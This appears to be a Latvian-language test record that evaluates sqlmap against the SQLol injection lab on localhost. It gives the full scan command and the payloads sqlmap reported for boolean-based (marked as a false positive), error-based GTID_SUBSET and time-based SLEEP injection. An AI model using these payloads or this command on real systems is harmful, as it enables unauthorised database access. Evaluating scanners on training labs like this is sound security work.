=================================================================================
1. Īpašība: tabulas ieraksti netiek izprinteti ieks .html, bet tiek raditas kludas
2. Nepiciešams tampering: nē
3. Sagaidāmais rezultāts: 
3.1. boolean-based: -
3.2. error-based: ?inject_string=test'
3.3. time-based: ?inject_string=test' or sleep(1)%23
3.4. union: -
4. Reālais rezultāts: redzams zemāk (neatklāts false positive)
5. Vidējais risinājuma ilgums: 16831082 nanosekundes
6. Palaistā komanda
sqlmap -u "http://localhost/MCIR/sqlol/select.php?sanitization_level=none&sanitization_type=keyword&sanitization_params=&query_results=none&error_level=verbose&inject_string=test&location=where_string&submit=Inject%21" -p inject_string --risk=3 --level=5

7. Jautājumi, kurus uzdeva SQLMap:
7.1. it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
7.2. do you want to (re)try to find proper UNION column types with fuzzy test? [y/N] y
7.3. GET parameters 'inject_string' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
=================================================================================
sqlmap identified the following injection point(s) with a total of 719 HTTP(s) requests:
---
Parameter: inject_string (GET)
    Type: boolean-based blind (FALSE POSITIVE)
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: sanitization_level=none&sanitization_type=keyword&sanitization_params=&query_results=none&error_level=verbose&inject_string=test' AND 7724=(SELECT (CASE WHEN (7724=7724) THEN 7724 ELSE (SELECT 8887 UNION SELECT 3133) END))-- -&location=where_string&submit=Inject!

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: sanitization_level=none&sanitization_type=keyword&sanitization_params=&query_results=none&error_level=verbose&inject_string=test' AND GTID_SUBSET(CONCAT(0x716b707871,(SELECT (ELT(2047=2047,1))),0x71706b7071),2047)-- rqdP&location=where_string&submit=Inject!

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: sanitization_level=none&sanitization_type=keyword&sanitization_params=&query_results=none&error_level=verbose&inject_string=test' AND (SELECT 8985 FROM (SELECT(SLEEP(5)))RZIa)-- tZYI&location=where_string&submit=Inject!
---
web application technology: Apache 2.4.38, PHP 5.6.40
back-end DBMS: MySQL >= 5.6
